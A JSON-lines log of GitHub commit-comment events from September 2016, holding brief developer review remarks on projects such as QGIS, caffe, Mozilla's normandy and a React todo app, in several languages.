{"id":"4511691830","type":"CommitCommentEvent","actor":{"login":"Serg-Norseman"},"repo":{"name":"Serg-Norseman/GEDKeeper"},"payload":{"comment":{"id":18889006,"position":28,"line":54,"path":"projects/GEDKeeper2/GKCore/SCCrypt.cs","commit_id":"ce2c1efed6fe2567ab148e6923d5d88deeffe89e","created_at":"2016-09-03T06:08:29Z","updated_at":"2016-09-03T06:08:29Z","body":"The best code is the one which is not! :laughing: "}},"created_at":"2016-09-03T06:08:29Z"}
{"id":"4511694397","type":"CommitCommentEvent","actor":{"login":"gajop"},"repo":{"name":"Spring-Chobby/Chobby"},"payload":{"comment":{"id":18889017,"position":8,"line":0,"path":"LuaMenu/widgets/gui_login_window.lua","commit_id":"3cfa67f23f907a15fc73a3266d991871c7f3cd22","created_at":"2016-09-03T06:11:08Z","updated_at":"2016-09-03T06:11:08Z","body":"Please use Spring.Log in these kind of situations. It might not do much on Windows, but it helps Linux devs catch bugs much easier"}},"created_at":"2016-09-03T06:11:08Z"}
{"id":"4511695133","type":"CommitCommentEvent","actor":{"login":"derpixler"},"repo":{"name":"inpsyde/wpml2mlp"},"payload":{"comment":{"id":18889024,"position":6,"line":0,"path":"inc/Export/AdminPage/Table.php","commit_id":"75ea0fe9b4e91327c685ca9ae617475ab9d6bdbb","created_at":"2016-09-03T06:11:57Z","updated_at":"2016-09-03T06:11:57Z","body":"give me more hints please."}},"created_at":"2016-09-03T06:11:57Z"}
{"id":"4511695381","type":"CommitCommentEvent","actor":{"login":"erikkemperman"},"repo":{"name":"erikkemperman/vinyl-prepare"},"payload":{"comment":{"id":18889025,"position":30,"line":34,"path":"index.js","commit_id":"e19492906f1d0de40412cefb6cd4589720d06ecf","created_at":"2016-09-03T06:12:10Z","updated_at":"2016-09-03T06:12:10Z","body":"I need to look at it more I guess, don't recall seeing a warning to not use the caches is deliberately exposes.\r\n\r\nAnd I don't understand how it can only stat dirs, because it has to do the stat to see what it is...? Unless you mean it only (caches the) stats for `**` path components?"}},"created_at":"2016-09-03T06:12:10Z"}
{"id":"4511696624","type":"CommitCommentEvent","actor":{"login":"vik-y"},"repo":{"name":"vik-y/network-stat"},"payload":{"comment":{"id":18889026,"position":null,"line":null,"path":null,"commit_id":"1f56a892315e64ede5b1a529498108776bdac44a","created_at":"2016-09-03T06:13:27Z","updated_at":"2016-09-03T06:13:27Z","body":"@slack \r\n\r\nCan anyone finish these two functions in there spare time this weekend? "}},"created_at":"2016-09-03T06:13:27Z"}
{"id":"4511698831","type":"CommitCommentEvent","actor":{"login":"magicrub"},"repo":{"name":"mavlink/mavlink"},"payload":{"comment":{"id":18889032,"position":null,"line":null,"path":null,"commit_id":"8201e5fa8d7e9389720499630601ba8e4468204d","created_at":"2016-09-03T06:15:46Z","updated_at":"2016-09-03T06:15:46Z","body":"It's shared by all projects. Hence, common.\n\nOn Sep 2, 2016 10:41 PM, \"Daniel Agar\" <notifications@github.com> wrote:\n\n> It's shared by PX4 and Ardupilot.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/mavlink/mavlink/commit/8201e5fa8d7e9389720499630601ba8e4468204d#commitcomment-18888908>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AEj7G4kWCJDS4eGqJpGti7wlpJkSv1Tcks5qmQh5gaJpZM4J0BFV>\n> .\n>\n"}},"created_at":"2016-09-03T06:15:46Z"}
{"id":"4511699398","type":"CommitCommentEvent","actor":{"login":"liuzhen"},"repo":{"name":"project-fifo/chunter"},"payload":{"comment":{"id":18889033,"position":null,"line":null,"path":null,"commit_id":"7bbf7846e1ea270a46460947e2ad94cc8fcaca9a","created_at":"2016-09-03T06:16:23Z","updated_at":"2016-09-03T06:16:23Z","body":"no release lock here?"}},"created_at":"2016-09-03T06:16:23Z"}
{"id":"4511700223","type":"CommitCommentEvent","actor":{"login":"cheezenaan"},"repo":{"name":"cheezenaan/WDP92_todo_app"},"payload":{"comment":{"id":18889035,"position":8,"line":8,"path":"app/assets/javascripts/TaskList.js","commit_id":"f08fc3dd7cd6a46c5d416789b893a1534ceb01cd","created_at":"2016-09-03T06:17:09Z","updated_at":"2016-09-03T06:17:09Z","body":"[Q]\r\n``task.id``って uniqueじゃなかったっけ…\r\n```\r\nbundle.self-e43d13f….js?body=1:1819 Warning: Each child in an array or iterator should have a unique \"key\" prop. Check the render method of `TaskList`. See https://fb.me/react-warning-keys for more information.\r\n    in Task (created by TaskList)\r\n    in TaskList (created by TaskApp)\r\n    in table (created by TaskApp)\r\n    in div (created by TaskApp)\r\n    in TaskApp\r\n```"}},"created_at":"2016-09-03T06:17:09Z"}
{"id":"4511701844","type":"CommitCommentEvent","actor":{"login":"elimisteve"},"repo":{"name":"elimisteve/cryptag"},"payload":{"comment":{"id":18889040,"position":null,"line":null,"path":null,"commit_id":"8e4fa7e970b59ec6b0cce77e81dba724e9f09a87","created_at":"2016-09-03T06:18:48Z","updated_at":"2016-09-03T06:18:48Z","body":"@samdolan Yeah but since it's exported, in every package other than this one it'll be referenced as `backend.TypeDropboxRemote`."}},"created_at":"2016-09-03T06:18:48Z"}
{"id":"4511702796","type":"CommitCommentEvent","actor":{"login":"bhavyangupta"},"repo":{"name":"bhavyangupta/travis_ci_test"},"payload":{"comment":{"id":18889042,"position":null,"line":null,"path":null,"commit_id":"22febe43b835eca6a6666d3ab920f713fa286644","created_at":"2016-09-03T06:19:45Z","updated_at":"2016-09-03T06:19:45Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;rSGzpkFd&#x2F;16-need-help\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Need help?</a>"}},"created_at":"2016-09-03T06:19:45Z"}
{"id":"4511703095","type":"CommitCommentEvent","actor":{"login":"bhavyangupta"},"repo":{"name":"bhavyangupta/travis_ci_test"},"payload":{"comment":{"id":18889043,"position":null,"line":null,"path":null,"commit_id":"3061553e2de64b1a096e8981e483b1140675f450","created_at":"2016-09-03T06:20:05Z","updated_at":"2016-09-03T06:20:05Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;rSGzpkFd&#x2F;16-need-help\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Need help?</a>"}},"created_at":"2016-09-03T06:20:05Z"}
{"id":"4511705515","type":"CommitCommentEvent","actor":{"login":"Nechrito"},"repo":{"name":"LeagueSharp-Devs/LeagueSharp.SDKEx"},"payload":{"comment":{"id":18889046,"position":null,"line":null,"path":null,"commit_id":"c3d2c560fcaa87cc08f9f96c698c7746707404e1","created_at":"2016-09-03T06:22:28Z","updated_at":"2016-09-03T06:22:28Z","body":"FeelsBadMan"}},"created_at":"2016-09-03T06:22:28Z"}
{"id":"4511706531","type":"CommitCommentEvent","actor":{"login":"lld533"},"repo":{"name":"BVLC/caffe"},"payload":{"comment":{"id":18889047,"position":null,"line":null,"path":null,"commit_id":"b43c8e43a95608a00033f8f8867d32a201e5eed4","created_at":"2016-09-03T06:23:26Z","updated_at":"2016-09-03T06:23:26Z","body":"In Line ~40 of cudnn_{tanh, sigmoid, relu}_layer.cpp, to prevent possible memory leak, it's better to destroy activation descriptor by calling \"cudnnDestroyActivationDescriptor(this->activ_desc_)\"; before destroy the handle_. Much thanks."}},"created_at":"2016-09-03T06:23:26Z"}
{"id":"4511706488","type":"CommitCommentEvent","actor":{"login":"pmoulon"},"repo":{"name":"y22ma/openMVS"},"payload":{"comment":{"id":18889048,"position":4,"line":36,"path":"libs/MVS/Scene.cpp","commit_id":"297eaca63ba9310c7de3c9cfbeab9b40c229a2cb","created_at":"2016-09-03T06:23:27Z","updated_at":"2016-09-03T06:23:27Z","body":"Useless include. You do not need to include two time the same file"}},"created_at":"2016-09-03T06:23:27Z"}
{"id":"4511706603","type":"CommitCommentEvent","actor":{"login":"archersify"},"repo":{"name":"filipinotutor/public_html"},"payload":{"comment":{"id":18889049,"position":3,"line":3,"path":"v2/admin/applicants-all.php","commit_id":"eee5be071092bf83181bfd60c39e06936d31112d","created_at":"2016-09-03T06:23:33Z","updated_at":"2016-09-03T06:23:33Z","body":"Testing write."}},"created_at":"2016-09-03T06:23:33Z"}
{"id":"4511707589","type":"CommitCommentEvent","actor":{"login":"lekma"},"repo":{"name":"lekma/tvheadend"},"payload":{"comment":{"id":18889051,"position":null,"line":null,"path":null,"commit_id":"06207f2eb2d175d17f8949888654b388002b02f3","created_at":"2016-09-03T06:24:35Z","updated_at":"2016-09-03T06:24:35Z","body":"@vigiljose\r\nI would start by testing with tvheadend master to see if the pb you're seeing has been introduced by this branch.\r\n\r\nIf it originates from my work then please open an issue here in the tracker, I'll try to help you. If it is an issue with tvheadend in general, I'd suggest you submit a bug report to https://tvheadend.org/projects/tvheadend/issues. In any case this commit is not the place to discuss bugs, again, I'm bound to squash it all and all the conversation will be lost, unfortunate as it is.\r\n\r\n(side note: you have to try and isolate the conditions to reproduce what you are seeing, is it the source (try different source format (SD vs HD) if you can), is it the filtering (try with/without deint and scaling), are all the clients watching the same transcode or is it 3 different transcode happening at the same time, etc. The more info you provide, the better it will be for either @perexg or me to try and help you)"}},"created_at":"2016-09-03T06:24:35Z"}
{"id":"4511708655","type":"CommitCommentEvent","actor":{"login":"nyalldawson"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18889052,"position":null,"line":null,"path":null,"commit_id":"34e2bea24635e15e981ef915219b1095f51bbe90","created_at":"2016-09-03T06:25:29Z","updated_at":"2016-09-03T06:25:29Z","body":"@fritsvanveen is there an updated commit I should be looking at? "}},"created_at":"2016-09-03T06:25:29Z"}
{"id":"4511716038","type":"CommitCommentEvent","actor":{"login":"aditheking"},"repo":{"name":"yu-aosp-n/platform_manifest"},"payload":{"comment":{"id":18889074,"position":null,"line":null,"path":null,"commit_id":"58347d3e725d4a612b5d10123495a9d77f3c4a82","created_at":"2016-09-03T06:33:12Z","updated_at":"2016-09-03T06:33:12Z","body":"@HridayHS Derp Line No 46 \r\nremote=\"yu-aosp-n\" /> you forgot to put \"=\""}},"created_at":"2016-09-03T06:33:12Z"}
{"id":"4511717176","type":"CommitCommentEvent","actor":{"login":"GusCaplan"},"repo":{"name":"GusCaplan/node-thebluealliance"},"payload":{"comment":{"id":18889075,"position":32,"line":36,"path":"package.json","commit_id":"22d26d534f709e1433f07aa29222ed1a2260e036","created_at":"2016-09-03T06:34:19Z","updated_at":"2016-09-03T06:34:19Z","body":"this just made reading the npm page annoying"}},"created_at":"2016-09-03T06:34:19Z"}
{"id":"4511720239","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"CovertJaguar/Railcraft"},"payload":{"comment":{"id":18889085,"position":37,"line":37,"path":"src/main/java/mods/railcraft/common/blocks/tracks/TrackIngredients.java","commit_id":"9ad4011ef934b9a2bb6f91ddae98f29056bb66fa","created_at":"2016-09-03T06:37:06Z","updated_at":"2016-09-03T06:37:06Z","body":"Will this be a conflict with above?"}},"created_at":"2016-09-03T06:37:06Z"}
{"id":"4511721021","type":"CommitCommentEvent","actor":{"login":"hooperfly"},"repo":{"name":"paparazzi/paparazzi"},"payload":{"comment":{"id":18889087,"position":null,"line":null,"path":null,"commit_id":"16a447da37ea718646906756cda17a5ed38d8739","created_at":"2016-09-03T06:37:51Z","updated_at":"2016-09-03T06:37:51Z","body":"@gautierhattenberger and @flixr \r\n\r\nDoes this impact any code that references `auto2`?\r\n\r\nIf you run the following command against the ./sw folder:\r\n`grep -i -r auto2 .`\r\n\r\nIt seems there are few other files that might need to convert `auto2_index` references to `ap_mode`\r\n\r\n"}},"created_at":"2016-09-03T06:37:51Z"}
{"id":"4511723331","type":"CommitCommentEvent","actor":{"login":"Osmose"},"repo":{"name":"Osmose/normandy"},"payload":{"comment":{"id":18889092,"position":256,"line":256,"path":"client/control/components/SimpleRecipeForm.js","commit_id":"4355fcde6aa270749ee2bf48b17f4bf8421d673e","created_at":"2016-09-03T06:40:06Z","updated_at":"2016-09-03T06:40:06Z","body":"Not a huge fan of this but couldn't come up with something I liked more."}},"created_at":"2016-09-03T06:40:06Z"}
{"id":"4511723638","type":"CommitCommentEvent","actor":{"login":"aqw"},"repo":{"name":"emilsvennesson/kodi-espnplayer"},"payload":{"comment":{"id":18889094,"position":null,"line":null,"path":null,"commit_id":"74a57e18f48a4987b87626b90372a5148b8faed6","created_at":"2016-09-03T06:40:17Z","updated_at":"2016-09-03T06:40:17Z","body":"@emilsvennesson Very nice! :-)\r\n\r\nGlad to see it's getting wider use. :-)\r\n\r\nI noticed your license is GPL-3, but the original code is GPL-2. That's fine with me, but technically you can't just change the license of the code. So, just to be explicit, my contributions to this code can be used as GPL-2+ (version 2 and later). You should double check with @BaumSchorle that he's also ok with that, and then you should be good to go. :-)\r\n\r\n---Alex"}},"created_at":"2016-09-03T06:40:17Z"}
{"id":"4511724024","type":"CommitCommentEvent","actor":{"login":"Osmose"},"repo":{"name":"Osmose/normandy"},"payload":{"comment":{"id":18889096,"position":12,"line":12,"path":"client/control/components/SimpleRecipeForm.js","commit_id":"4355fcde6aa270749ee2bf48b17f4bf8421d673e","created_at":"2016-09-03T06:40:37Z","updated_at":"2016-09-03T06:40:37Z","body":"This might be a bit too generic of a helper."}},"created_at":"2016-09-03T06:40:37Z"}
{"id":"4511724962","type":"CommitCommentEvent","actor":{"login":"Osmose"},"repo":{"name":"Osmose/normandy"},"payload":{"comment":{"id":18889099,"position":22,"line":22,"path":"client/control/components/SimpleRecipeForm.js","commit_id":"4355fcde6aa270749ee2bf48b17f4bf8421d673e","created_at":"2016-09-03T06:41:31Z","updated_at":"2016-09-03T06:41:31Z","body":"I actually really like not having the form field component handle the actual input we use. I think it ends up being more readable."}},"created_at":"2016-09-03T06:41:31Z"}
{"id":"4511726457","type":"CommitCommentEvent","actor":{"login":"Osmose"},"repo":{"name":"Osmose/normandy"},"payload":{"comment":{"id":18889102,"position":85,"line":85,"path":"client/control/components/SimpleRecipeForm.js","commit_id":"4355fcde6aa270749ee2bf48b17f4bf8421d673e","created_at":"2016-09-03T06:43:01Z","updated_at":"2016-09-03T06:43:01Z","body":"Maybe surveys shouldn't be a list, but a map with these UUIDs as the keys? Not having IDs to refer to these makes the logic here way more complex.\r\n\r\nThe conflict with the `surveyId` field isn't great either, but I think eventually we'll be calling these \"variants\" instead of surveys anyway."}},"created_at":"2016-09-03T06:43:01Z"}
{"id":"4511728409","type":"CommitCommentEvent","actor":{"login":"Osmose"},"repo":{"name":"Osmose/normandy"},"payload":{"comment":{"id":18889105,"position":null,"line":null,"path":null,"commit_id":"4355fcde6aa270749ee2bf48b17f4bf8421d673e","created_at":"2016-09-03T06:44:53Z","updated_at":"2016-09-03T06:44:53Z","body":"A lot of the verbose state changes here would be improved by using ImmutableJS for the state."}},"created_at":"2016-09-03T06:44:53Z"}
{"id":"4511729157","type":"CommitCommentEvent","actor":{"login":"cheezenaan"},"repo":{"name":"cheezenaan/WDP92_todo_app"},"payload":{"comment":{"id":18889107,"position":5,"line":41,"path":"app/controllers/tasks_controller.rb","commit_id":"8f76978306bf36d3c9aa544ba0ae02e048c2a406","created_at":"2016-09-03T06:45:33Z","updated_at":"2016-09-03T06:45:33Z","body":"[comments]\r\n完全なkszkケアレスで萎える"}},"created_at":"2016-09-03T06:45:33Z"}
{"id":"4511730026","type":"CommitCommentEvent","actor":{"login":"Blurooo"},"repo":{"name":"Blurooo/H5Loading"},"payload":{"comment":{"id":18889109,"position":18,"line":18,"path":"loading.js","commit_id":"83273d8ed2a11fddb3f6e5941131fef49bcdd29f","created_at":"2016-09-03T06:46:27Z","updated_at":"2016-09-03T06:46:27Z","body":"修改默认动画时长为1s"}},"created_at":"2016-09-03T06:46:27Z"}
{"id":"4511730242","type":"CommitCommentEvent","actor":{"login":"cheezenaan"},"repo":{"name":"cheezenaan/WDP92_todo_app"},"payload":{"comment":{"id":18889110,"position":6,"line":16,"path":"app/assets/javascripts/TaskApp.js","commit_id":"8f76978306bf36d3c9aa544ba0ae02e048c2a406","created_at":"2016-09-03T06:46:43Z","updated_at":"2016-09-03T06:46:43Z","body":"SuperAgent, サーバへリクエスト投げる際の書き方が直感的で良いなと思った(konami"}},"created_at":"2016-09-03T06:46:43Z"}
{"id":"4511730702","type":"CommitCommentEvent","actor":{"login":"cheezenaan"},"repo":{"name":"cheezenaan/WDP92_todo_app"},"payload":{"comment":{"id":18889111,"position":18,"line":28,"path":"app/assets/javascripts/TaskApp.js","commit_id":"8f76978306bf36d3c9aa544ba0ae02e048c2a406","created_at":"2016-09-03T06:47:06Z","updated_at":"2016-09-03T06:47:06Z","body":"[comments]\r\nSuperAgent, サーバへリクエスト投げる際の書き方が直感的で良いなと思った(konami"}},"created_at":"2016-09-03T06:47:06Z"}
{"id":"4511731488","type":"CommitCommentEvent","actor":{"login":"Osmose"},"repo":{"name":"Osmose/normandy"},"payload":{"comment":{"id":18889112,"position":null,"line":null,"path":null,"commit_id":"4355fcde6aa270749ee2bf48b17f4bf8421d673e","created_at":"2016-09-03T06:47:52Z","updated_at":"2016-09-03T06:47:52Z","body":"The thinking here is that the form state (including errors) are transient; when the form disappears, so does it. It's also state used exclusively within the form, so it's a natural fit for being stored in react state vs redux state. AJAX requests and the saved recipe state stay in redux because they are relevant to the app as a whole and we don't want to throw them away when we leave this form. "}},"created_at":"2016-09-03T06:47:52Z"}
{"id":"4511731758","type":"CommitCommentEvent","actor":{"login":"BelminSalkica"},"repo":{"name":"BelminSalkica/WIP-Zadace"},"payload":{"comment":{"id":18889113,"position":null,"line":null,"path":null,"commit_id":"8c3178b50ba36d25e4767d1e4fbbb2cd89da7594","created_at":"2016-09-03T06:48:08Z","updated_at":"2016-09-03T06:48:08Z","body":"Stvarno ne znam zašto kod mene nije radilo jer sam provjerio sve i na kraju sam odlučio da krenem ponovo i uspio sam samo imam još par sitnica pa kad završim poslat ću... \r\n👍 "}},"created_at":"2016-09-03T06:48:08Z"}
{"id":"4511732022","type":"CommitCommentEvent","actor":{"login":"cheezenaan"},"repo":{"name":"cheezenaan/WDP92_todo_app"},"payload":{"comment":{"id":18889114,"position":8,"line":8,"path":"app/assets/javascripts/Task.js","commit_id":"8f76978306bf36d3c9aa544ba0ae02e048c2a406","created_at":"2016-09-03T06:48:21Z","updated_at":"2016-09-03T06:48:21Z","body":"執拗に出てくる``props``については以下の記事参照\r\n* [React.jsでPropやStateを使ってComponent間のやりとりをする - Qiita](http://qiita.com/koba04/items/43200b6fd6e6f43f0d8d)\r\n* [今からはじめるReact.js〜propsとstate、それからrefs〜 - Qiita](http://qiita.com/kuniken/items/a22adda392ccc30011b1)"}},"created_at":"2016-09-03T06:48:21Z"}
{"id":"4511732364","type":"CommitCommentEvent","actor":{"login":"cheezenaan"},"repo":{"name":"cheezenaan/WDP92_todo_app"},"payload":{"comment":{"id":18889115,"position":7,"line":7,"path":"app/assets/javascripts/Task.js","commit_id":"8f76978306bf36d3c9aa544ba0ae02e048c2a406","created_at":"2016-09-03T06:48:43Z","updated_at":"2016-09-03T06:48:43Z","body":"執拗に出てくる``props``については以下の記事参照\r\n* [React.jsでPropやStateを使ってComponent間のやりとりをする - Qiita](http://qiita.com/koba04/items/43200b6fd6e6f43f0d8d)\r\n* [今からはじめるReact.js〜propsとstate、それからrefs〜 - Qiita](http://qiita.com/kuniken/items/a22adda392ccc30011b1)"}},"created_at":"2016-09-03T06:48:43Z"}
{"id":"4511732565","type":"CommitCommentEvent","actor":{"login":"joostfaassen"},"repo":{"name":"droid-php/droid"},"payload":{"comment":{"id":18889119,"position":null,"line":null,"path":null,"commit_id":"6076fe53d790bdc2a44f9b64c70d3485e66c2bfc","created_at":"2016-09-03T06:48:53Z","updated_at":"2016-09-03T06:48:53Z","body":"🎸 "}},"created_at":"2016-09-03T06:48:53Z"}
{"id":"4511733309","type":"CommitCommentEvent","actor":{"login":"cheezenaan"},"repo":{"name":"cheezenaan/WDP92_todo_app"},"payload":{"comment":{"id":18889121,"position":26,"line":79,"path":"app/assets/javascripts/TaskApp.js","commit_id":"8f76978306bf36d3c9aa544ba0ae02e048c2a406","created_at":"2016-09-03T06:49:27Z","updated_at":"2016-09-03T06:49:27Z","body":"[Q]\r\nやたら出てきた``bind(this)``って、なんだっけかな"}},"created_at":"2016-09-03T06:49:27Z"}
{"id":"4511734447","type":"CommitCommentEvent","actor":{"login":"Osmose"},"repo":{"name":"Osmose/normandy"},"payload":{"comment":{"id":18889125,"position":228,"line":228,"path":"client/control/components/SimpleRecipeForm.js","commit_id":"4355fcde6aa270749ee2bf48b17f4bf8421d673e","created_at":"2016-09-03T06:50:37Z","updated_at":"2016-09-03T06:50:37Z","body":"Not a fan of this."}},"created_at":"2016-09-03T06:50:37Z"}
{"id":"4511735957","type":"CommitCommentEvent","actor":{"login":"fritsvanveen"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18889126,"position":null,"line":null,"path":null,"commit_id":"34e2bea24635e15e981ef915219b1095f51bbe90","created_at":"2016-09-03T06:52:05Z","updated_at":"2016-09-03T06:52:05Z","body":"@nyalldawson Not yet, let's wait until I fixed the other bug."}},"created_at":"2016-09-03T06:52:05Z"}
{"id":"4511739326","type":"CommitCommentEvent","actor":{"login":"Osmose"},"repo":{"name":"Osmose/normandy"},"payload":{"comment":{"id":18889131,"position":null,"line":null,"path":null,"commit_id":"4355fcde6aa270749ee2bf48b17f4bf8421d673e","created_at":"2016-09-03T06:55:38Z","updated_at":"2016-09-03T06:55:38Z","body":"This is a WIP rewrite of the recipe form without redux-form. The main thing making this possible is that I store all the form state inside of React component state instead of storing it in Redux. That helps avoid a lot (but not all) of the boilerplate problems with not using redux-form. It clocks in at roughly the same amount of lines as the current redux-form implementation (pretty sure, at least) and I _think_ does everything the current one does.\r\n\r\nThe bug that originally drove me to this was showing an error message for when JSON schema validation says that you need at least 1 survey. While I didn't include it because I didn't come up with good styling for it, I was able to get the message displaying properly with like two extra lines, which I think is a good sign.\r\n\r\n@mythmon, @brittanystoroz, @rehandalal, thoughts? "}},"created_at":"2016-09-03T06:55:38Z"}
{"id":"4511740203","type":"CommitCommentEvent","actor":{"login":"ramapcsx2"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":18889133,"position":null,"line":null,"path":null,"commit_id":"774d98991cf8c06188a9b415fd72bc5cdbe01f5d","created_at":"2016-09-03T06:56:27Z","updated_at":"2016-09-03T06:56:27Z","body":"Thanks :)"}},"created_at":"2016-09-03T06:56:27Z"}
{"id":"4511741083","type":"CommitCommentEvent","actor":{"login":"poizen18"},"repo":{"name":"poizen18/scfs"},"payload":{"comment":{"id":18889134,"position":null,"line":null,"path":null,"commit_id":"9a1b04f2f0d15aa493059b43ab1080a1ce5d93ef","created_at":"2016-09-03T06:57:24Z","updated_at":"2016-09-03T06:57:24Z","body":"updated some scripts, TODO: make it faster. "}},"created_at":"2016-09-03T06:57:24Z"}
{"id":"4511741927","type":"CommitCommentEvent","actor":{"login":"SH-M"},"repo":{"name":"IAHM-COL/KingAir-350"},"payload":{"comment":{"id":18889135,"position":null,"line":null,"path":null,"commit_id":"d13e6ddeed75a28c00128d1782106672dd530870","created_at":"2016-09-03T06:58:20Z","updated_at":"2016-09-03T06:58:20Z","body":"go ahead with the instruments and levers :+1: \r\nI will start mapping the lights to their switches."}},"created_at":"2016-09-03T06:58:20Z"}
{"id":"4511744569","type":"CommitCommentEvent","actor":{"login":"un1versal"},"repo":{"name":"justinfrankel/licecap"},"payload":{"comment":{"id":18889155,"position":null,"line":null,"path":null,"commit_id":"d7035ae9d4b27236fef2cf0ddd68b05c13080412","created_at":"2016-09-03T07:00:36Z","updated_at":"2016-09-03T07:00:36Z","body":"still broken in Windows"}},"created_at":"2016-09-03T07:00:36Z"}
{"id":"4511749569","type":"CommitCommentEvent","actor":{"login":"jdubois"},"repo":{"name":"jhipster/jhipster-registry"},"payload":{"comment":{"id":18889163,"position":45,"line":503,"path":"pom.xml","commit_id":"8f561cbf2c82238c5d6893fcb00f7951a1a83275","created_at":"2016-09-03T07:04:40Z","updated_at":"2016-09-03T07:04:40Z","body":"No - I was doing this because we had issues when deploying a packaged WAR file on a \"real\" Tomcat. As we had the same JARs twice (one version in the Tomcat classloader, another version in the WAR), you can guess this wasn't going to end well. With Undertow, we don't have that issue anymore! That's one of the reasons I wanted to switch."}},"created_at":"2016-09-03T07:04:40Z"}
{"id":"4511750683","type":"CommitCommentEvent","actor":{"login":"SH-M"},"repo":{"name":"IAHM-COL/KingAir-350"},"payload":{"comment":{"id":18889166,"position":null,"line":null,"path":null,"commit_id":"f45c78c18ba5a69f4b20afa694d7149a67e65d51","created_at":"2016-09-03T07:05:39Z","updated_at":"2016-09-03T07:05:39Z","body":"lol. \"Check thermos with coffee\"\r\n"}},"created_at":"2016-09-03T07:05:39Z"}
{"id":"4511750924","type":"CommitCommentEvent","actor":{"login":"SferaDev"},"repo":{"name":"AOSPA/android_build"},"payload":{"comment":{"id":18889167,"position":6,"line":26,"path":"target/product/full_base_telephony.mk","commit_id":"2363911dcc2af167242e9c2b2d75160d17bd70a9","created_at":"2016-09-03T07:05:53Z","updated_at":"2016-09-03T07:05:53Z","body":"Derp"}},"created_at":"2016-09-03T07:05:53Z"}
{"id":"4511752514","type":"CommitCommentEvent","actor":{"login":"jackpoz"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18889184,"position":null,"line":null,"path":null,"commit_id":"a4623efaa67be1cfea19e561be83f118a784b9d1","created_at":"2016-09-03T07:07:26Z","updated_at":"2016-09-03T07:07:26Z","body":"I still wonder how it was working during the tests without the missing break :P"}},"created_at":"2016-09-03T07:07:26Z"}
{"id":"4511752823","type":"CommitCommentEvent","actor":{"login":"D-ECHO"},"repo":{"name":"IAHM-COL/KingAir-350"},"payload":{"comment":{"id":18889185,"position":null,"line":null,"path":null,"commit_id":"d13e6ddeed75a28c00128d1782106672dd530870","created_at":"2016-09-03T07:07:43Z","updated_at":"2016-09-03T07:07:43Z","body":"there is a gap between the cabin and the cockpit, I'd send an image, but fg is atm updating and I cant open it :("}},"created_at":"2016-09-03T07:07:43Z"}
{"id":"4511753055","type":"CommitCommentEvent","actor":{"login":"phated"},"repo":{"name":"erikkemperman/vinyl-prepare"},"payload":{"comment":{"id":18889186,"position":30,"line":34,"path":"index.js","commit_id":"e19492906f1d0de40412cefb6cd4589720d06ecf","created_at":"2016-09-03T07:07:58Z","updated_at":"2016-09-03T07:07:58Z","body":"Maybe I am misunderstanding the docs:\r\n\r\n> `stat` Set to true to stat _all_ results. This reduces performance somewhat, and is completely unnecessary, unless `readdir` is presumed to be an untrustworthy indicator of file existence.\r\n\r\nAnd\r\n\r\n> `statCache` A cache of results of filesystem information, to prevent unnecessary stat calls. While it should not normally be necessary to set this, you may pass the statCache from one glob() call to the options object of another, if you know that the filesystem will not change between calls. (See \"Race Conditions\" below.)\r\n"}},"created_at":"2016-09-03T07:07:58Z"}
{"id":"4511753357","type":"CommitCommentEvent","actor":{"login":"flx42"},"repo":{"name":"BVLC/caffe"},"payload":{"comment":{"id":18889187,"position":null,"line":null,"path":null,"commit_id":"b43c8e43a95608a00033f8f8867d32a201e5eed4","created_at":"2016-09-03T07:08:15Z","updated_at":"2016-09-03T07:08:15Z","body":"@lld533: you should submit a PR then."}},"created_at":"2016-09-03T07:08:15Z"}
{"id":"4511755523","type":"CommitCommentEvent","actor":{"login":"Viper2k4"},"repo":{"name":"MTK4355/PokemonGo-Bot"},"payload":{"comment":{"id":18889188,"position":null,"line":null,"path":null,"commit_id":"2216ae7728375c116965cb9a97c6f363ecfc2e9c","created_at":"2016-09-03T07:10:24Z","updated_at":"2016-09-03T07:10:24Z","body":"i read it i read it :P"}},"created_at":"2016-09-03T07:10:24Z"}
{"id":"4511755552","type":"CommitCommentEvent","actor":{"login":"fno2010"},"repo":{"name":"snlab/snlab.devopen.server"},"payload":{"comment":{"id":18889189,"position":35,"line":35,"path":"managerd.js","commit_id":"52e46ca8a8b57bf877c84f4f6a00e22a9917c215","created_at":"2016-09-03T07:10:26Z","updated_at":"2016-09-03T07:10:26Z","body":"Replace \"controllers.db\" as a configurable option. For example, use `options.dbbase` (default: `dirname(options.packagepath)`) and `options.dbfile` (default: `controllers.db`)."}},"created_at":"2016-09-03T07:10:26Z"}
{"id":"4511756196","type":"CommitCommentEvent","actor":{"login":"alesaiko"},"repo":{"name":"alesaiko/kernel_msm"},"payload":{"comment":{"id":18889195,"position":null,"line":null,"path":null,"commit_id":"8b468160010cd8d104770cc9037e2ea108870937","created_at":"2016-09-03T07:11:08Z","updated_at":"2016-09-03T07:11:08Z","body":"Ok, dude, I'll check out the code. Thanks!"}},"created_at":"2016-09-03T07:11:08Z"}
{"id":"4511757936","type":"CommitCommentEvent","actor":{"login":"cheezenaan"},"repo":{"name":"cheezenaan/WDP92_todo_app"},"payload":{"comment":{"id":18889197,"position":5,"line":7,"path":"app/assets/javascripts/app.js","commit_id":"f08fc3dd7cd6a46c5d416789b893a1534ceb01cd","created_at":"2016-09-03T07:12:52Z","updated_at":"2016-09-03T07:12:52Z","body":"[Q]\r\n？？？「こんな頻度で``Tasks#index``叩いて大丈夫か」"}},"created_at":"2016-09-03T07:12:52Z"}
